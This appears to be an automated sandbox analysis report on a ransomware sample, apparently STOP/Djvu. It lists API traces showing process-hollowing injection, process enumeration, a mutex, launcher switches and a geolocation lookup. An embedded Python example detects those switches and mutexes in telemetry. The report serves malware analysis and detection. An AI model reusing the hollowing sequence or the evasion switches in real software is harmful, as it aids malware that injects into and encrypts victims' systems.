• Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
• Instruction ID: 75bee004cc5b2263cfe8e133f1d60edae937d4d38bf2684a7469647c92d6a305
• Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
• Instruction Fuzzy Hash: 9A11EB31602659ABEB22762ADC06ABB738CFF14768F100566FE04D7242F725DD1043E5
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
• String ID:
• API String ID: 1559183368-0
• Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
• Instruction ID: ffdb418fc2ce45429b7bc37afdbd9faa0fed582eeca85e2f3323d5f3ad8fe4ae
• Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
• Instruction Fuzzy Hash: A351EE70A02385DBDB248F6BC88456E77B9BF48324F248329F835961D2E7789D52DB50
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: _memset
• String ID: D
• API String ID: 2102423945-2746444292
• Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
• Instruction ID: 39b55f63a07d6f406784f3b343806061d34550985676dd041c3d6fec758e9f8c
• Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
• Instruction Fuzzy Hash: 6AE15D71D00219EBCF24DBA0DD49FEEBBB8BF14304F14416AE509B6291EB786A46CF54
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: _memset
• String ID: $$$(
• API String ID: 2102423945-3551151888
• Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
• Instruction ID: a125747d57f5cba3d0de33763bccba305b67c3a8c364e6de1e4f25de1036977b
• Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
• Instruction Fuzzy Hash: 3C91AFB1D00258DAEF21CFA0CC5ABEEBBB4AF05304F24416DE40577281DBBA5E49CB65
Uniqueness Score: -1.00%

APIs
• std::exception::exception.LIBCMT ref: 0080FBF1
• __CxxThrowException@8.LIBCMT ref: 0080FC06
Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: Exception@8Throwstd::exception::exception
• String ID: TeM$TeM
• API String ID: 3728558374-3870166017
• Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
• Instruction ID: 383d34cacd518dcdbb535073706f9fb1512aab93afd9a1d43be7d4104b62ad93
• Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
• Instruction Fuzzy Hash: 7AD06775C0020CFBCB00EFA5D45ACDDBBB8AA04344F408466AA1497241EA78A7498B94
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007E197D: __wfsopen.LIBCMT ref: 007E1988
• _fgetws.LIBCMT ref: 007CD15C
Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: __wfsopen_fgetws
• String ID:
• API String ID: 853134316-0
• Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
• Instruction ID: c0018e0b21e7aa5ef420cb9946d8570273a8f6528d3104d8538d68df90ffceb5
• Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
• Instruction Fuzzy Hash: 4B918D72D01259EBCF21DFA4C889BAEB7B5BF14304F14053DE815A3241E779AE14CBA6
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: _malloc$__except_handler4_fprintf
• String ID:
• API String ID: 1783060780-0
• Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
• Instruction ID: 16d8866657b80164aa9986ae680bcb5e186ae3d8f221decc23c3184ac71e54cd
• Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
• Instruction Fuzzy Hash: 9DA154B1C00248DBEF11EFD4CC4ABDEBB75AF14304F14402DE50576292E7BA5A99CBA6
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID:
• String ID: -716T771$R_REVISION=5507
• API String ID: 0-1087220190
• Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
• Instruction ID: bfd48e734965576fc6845a401089d1534fc79087397250f00ac4ef40857f5270
• Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
• Instruction Fuzzy Hash: 4B118175F80B10B7F6213718AC87FD53449FB60B55F54042AF648AD2C3E7F654E4825A
Uniqueness Score: -1.00%

APIs
• __umatherr.LIBCMT ref: 007EF960
  • Part of subcall function 007EFCE3: __ctrlfp.LIBCMT ref: 007EFD42
• __ctrlfp.LIBCMT ref: 007EF983
Memory Dump Source
• Source File: 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, Offset: 007C0000, based on PE: false
Similarity
• API ID: __ctrlfp$__umatherr
• String ID: [:~
• API String ID: 219961500-230464001
• Opcode ID: 609237798d06c5ac2b4d2be0e5018503f9338edfc2fa56b33c37b0ec48d7a4eb
• Instruction ID: 6e40115c69b9de5feaab7740be20284bb73e6ed672d7d90b03697547ddf67acb
• Opcode Fuzzy Hash: 609237798d06c5ac2b4d2be0e5018503f9338edfc2fa56b33c37b0ec48d7a4eb
• Instruction Fuzzy Hash: ACF090B1904A0EFADB023F81E8467993FA0EF08350F204490F898145E2EB7694749B95
Uniqueness Score: -1.00%

Executed Functions

APIs
• VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00840156
• GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0084016C
• CreateProcessA.KERNELBASE(?,00000000), ref: 00840255
• VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00840270
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00840283
• GetThreadContext.KERNELBASE(00000000,?), ref: 0084029F
• ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008402C8
• NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008402E3
• VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00840304
• NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0084032A
• NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00840399
• WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008403BF
• SetThreadContext.KERNELBASE(00000000,?), ref: 008403E1
• ResumeThread.KERNELBASE(00000000), ref: 008403ED
• ExitProcess.KERNEL32(00000000), ref: 00840412
Memory Dump Source
• Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
• String ID:
• API String ID: 2875986403-0
• Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
• Instruction ID: f5f8de249a752b23cefbed054c34972100b3b01ad2f9152e341a78e3a24bcf60
• Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
• Instruction Fuzzy Hash: 9DB1C874A00208AFDB44CF98C895F9EBBB5FF88314F248158E609AB391D771AE41CF94
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNELBASE(user32), ref: 008406E2
Memory Dump Source
• Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID: CloseHandle$CreateFileA$CreateProcessA$CreateWindowExA$DefWindowProcA$ExitProcess$GetCommandLineA$GetFileAttributesA$GetMessageA$GetMessageExtraInfo$GetModuleFileNameA$GetStartupInfoA$GetThreadContext$MessageBoxA$NtUnmapViewOfSection$NtWriteVirtualMemory$PostMessageA$ReadProcessMemory$RegisterClassExA$ResumeThread$SetThreadContext$VirtualAlloc$VirtualAllocEx$VirtualFree$VirtualProtectEx$WaitForSingleObject$WinExec$WriteFile$WriteProcessMemory$kernel32$ntdll.dll$user32
• API String ID: 1029625771-3105132389
• Opcode ID: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
• Instruction ID: 0212bf60b5300e84f5dc61bcab4a023a4be99f6a185c8f90d2499f9673fa9875
• Opcode Fuzzy Hash: aab33881e6ea512dee0bea29e3953140485f8577d3db8e783070f8d433065c47
• Instruction Fuzzy Hash: 68A25460D0C6E8C9EB21C668CC4C7DDBEB51B26749F0841D9818C66292C7BB1B98CF76
Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00840533
Memory Dump Source
• Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: CreateWindow
• String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
• API String ID: 716092398-2341455598
• Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
• Instruction ID: 95aadb861234f5c93da3ae3891cbba4ad94096095da4063eb71f5f46e9fea03a
• Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
• Instruction Fuzzy Hash: DB511870D0838CDAEB11CBE8C849BDEBFB2AF15708F144058D5447F286C3BA5A58CB66
Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNELBASE(apfHQ), ref: 008405EC
Memory Dump Source
• Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
Similarity
• API ID: AttributesFile
• String ID: apfHQ$o
• API String ID: 3188754299-2999369273
• Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
• Instruction ID: 960d3b2adbcd2fc861a1b3a4fba5e72a4b194e7621fa6257f60437c1381a9697
• Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
• Instruction Fuzzy Hash: 2C011A70C0424CEADB10DBE8C5183AEBFB5EF51309F148099C5496B242D7B69B98CBA2
Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 65388428-3277548187
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 00863F51
                                                                                        • Part of subcall function 00865BA8: __getptd_noexit.LIBCMT ref: 00865BA8
                                                                                      • __gmtime64_s.LIBCMT ref: 00863FEA
                                                                                      • __gmtime64_s.LIBCMT ref: 00864020
                                                                                      • __gmtime64_s.LIBCMT ref: 0086403D
                                                                                      • __allrem.LIBCMT ref: 00864093
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640AF
                                                                                      • __allrem.LIBCMT ref: 008640C6
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008640E4
                                                                                      • __allrem.LIBCMT ref: 008640FB
                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00864119
                                                                                      • __invoke_watson.LIBCMT ref: 0086418A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                      • String ID:
                                                                                      • API String ID: 384356119-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free$ExitProcess___crt
                                                                                      • String ID:
                                                                                      • API String ID: 1022109855-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC1F
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC34
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC4D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC62
                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 0088FC74
                                                                                        • Part of subcall function 0088F914: std::exception::exception.LIBCMT ref: 0088F92E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC82
                                                                                      • std::exception::exception.LIBCMT ref: 0088FC9B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FCB0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                      • String ID: leM
                                                                                      • API String ID: 2862078307-2926266777
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 009066DD
                                                                                        • Part of subcall function 008659BF: __calloc_crt.LIBCMT ref: 008659E2
                                                                                        • Part of subcall function 008659BF: __initptd.LIBCMT ref: 00865A04
                                                                                      • __calloc_crt.LIBCMT ref: 00906700
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090671E
                                                                                      • __invoke_watson.LIBCMT ref: 0090673B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090676D
                                                                                      • __invoke_watson.LIBCMT ref: 0090678B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                      • String ID:
                                                                                      • API String ID: 4066021419-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1559183368-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: D
                                                                                      • API String ID: 2102423945-2746444292
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: $$$(
                                                                                      • API String ID: 2102423945-3551151888
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FBF1
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: TeM$TeM
                                                                                      • API String ID: 3728558374-3870166017
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                        • Part of subcall function 0086197D: __wfsopen.LIBCMT ref: 00861988
                                                                                      • _fgetws.LIBCMT ref: 0084D15C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wfsopen_fgetws
                                                                                      • String ID:
                                                                                      • API String ID: 853134316-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1783060780-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      APIs
                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0080DD20,?), ref: 0041A0BB
                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                      • API String ID: 2957410896-3144399390
                                                                                      • Opcode ID: 15b68a7a13bf0c1e1386151c75c3b37cb326e6516c5258aa6d0522fbbfdeb26f
                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                      • Opcode Fuzzy Hash: 15b68a7a13bf0c1e1386151c75c3b37cb326e6516c5258aa6d0522fbbfdeb26f
                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%
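The string table of the entry above carries the sample's own launcher switches (--Admin, --AutoStart, --ForNetRes, --Service, --Task) together with the two mutex GUIDs that the subcall at 004124E0 creates. The Python below is an added example, not part of the sandbox report or the sample, showing how to turn those strings into a telemetry check: the switches are matched as whole command-line tokens rather than substrings (so an unrelated "--AdminTool" does not fire), and the mutex names are matched against a mutex-creation record. The event dictionaries, their field names (EventType, CommandLine, MutexName) and the file paths are constructed for the example and stand in for whatever Sysmon or EDR schema is in use.

```python
import re

# Launcher switches and mutex names copied from the string table in the listing above.
DJVU_SWITCHES = ("--Admin", "--AutoStart", "--ForNetRes", "--Service", "--Task")
DJVU_MUTEXES = frozenset({
    "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}",
    "{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}",
})

# A token is either a double-quoted run (paths with spaces) or a run of non-space characters.
_TOKEN = re.compile(r'"[^"]*"|\S+')


def split_cmdline(cmdline):
    """Split a Windows command line into tokens, keeping quoted paths whole."""
    return [t.strip('"') for t in _TOKEN.findall(cmdline)]


def launcher_switches(cmdline):
    """Return the sample's switches present as whole, case-sensitive tokens.
    Whole-token matching is deliberate: '--AdminTool' must not match '--Admin'."""
    tokens = set(split_cmdline(cmdline))
    return [s for s in DJVU_SWITCHES if s in tokens]


def assess(event):
    """Score one telemetry record. The field names (EventType, CommandLine, MutexName)
    are an assumption for this example; map them to the Sysmon or EDR schema in use."""
    reasons = []
    kind = event.get("EventType")
    if kind == "ProcessCreate":
        hits = launcher_switches(event.get("CommandLine", ""))
        if hits:
            reasons.append("djvu launcher switch: " + ", ".join(hits))
    elif kind == "MutexCreate" and event.get("MutexName") in DJVU_MUTEXES:
        reasons.append("djvu mutex: " + event["MutexName"])
    return {"suspicious": bool(reasons), "reasons": reasons}


def scan(events):
    """Indices of the records that match."""
    return [i for i, ev in enumerate(events) if assess(ev)["suspicious"]]


# Constructed records for the example; the paths are made up, not sandbox output.
EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Users\user\AppData\Local\example\NZPC0PFaC0.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\example\NZPC0PFaC0.exe" --Admin IsNotAutoStart IsNotTask'},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"EventType": "ProcessCreate",
     "Image": r"C:\Program Files\Admin Tool\tool.exe",
     "CommandLine": r'"C:\Program Files\Admin Tool\tool.exe" --AdminTool'},
    {"EventType": "MutexCreate",
     "MutexName": "{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}"},
]


if __name__ == "__main__":
    for i in scan(EVENTS):
        print(i, assess(EVENTS[i])["reasons"])
```

Only the first and the last constructed record match; the "--AdminTool" record is the case that a naive substring search would wrongly flag.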

                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                      • API String ID: 3668891214-3807497772
                                                                                      • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                      • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                      Strings
                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
